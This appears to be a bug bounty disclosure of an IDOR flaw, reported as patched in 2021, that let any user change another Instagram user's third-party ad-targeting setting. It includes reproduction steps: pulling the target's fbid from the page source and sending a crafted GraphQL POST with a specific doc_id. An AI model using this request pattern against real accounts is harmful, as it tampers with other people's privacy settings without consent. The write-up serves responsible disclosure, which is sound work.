Marcos Ferreira

Published On: 22 Mar 2022

Change Ad Targeting setting of any Instagram User.

IDOR
Instagram | Android
---
LOW VALID
Description

On Instagram Android or iOS app, users have a control option to indicate whether they want Instagram to use data about their activity from partners to personalize their ads on Instagram. This setting includes information about activity on third-party sites and apps - https://www.facebook.com/help/instagram/2885653514995517

Impact

Due to an incorrect GraphQL configuration, any user can modify a specific other user's ad settings.




Reproduction Steps

Step
1

You will first need the InstagramV2 ID of the target user:
- Go to the Instagram profile
- Right-click the page and click on "View Page Source," or press Ctrl + U to see the page's source
- Search for "fbid"

Step
2

Send a POST request to graph.facebook.com/graphql and changes the value of the "igfbidv2" parameter to the fbid obtained in step 1;

variables={"igfbidv2":"0","isUndo":true}
doc_id=4155574647857786

Step
3

Response:

"data":{
"tc_opt_out_from_third_party_for_igfbidv2": {
"is_opted_out_from_third_party_for_igfbidv2": false,
"id": "000"
}

Bypass

After the patched confirmation, I found a bypass, but it was closed as duplicate internally.

Timeline
.
Marcos 07 Aug 2021

Initial Report

.
Facebook 09 Aug 2021

Triaged Thank you for reporting this information to us. We are sending it to the appropriate product team for further investigation. We will keep you upd ... See More

.
Facebook 10 Aug 2021

Bug Fixed We have looked into this issue and believe that the vulnerability has been patched. Please let us know if you believe that the patch does not res ... See More

.
Facebook 25 Aug 2021

Bounty awarded You demonstrated an issue that could have allowed to modify a specific other user ad settings.

VALID






Show All Images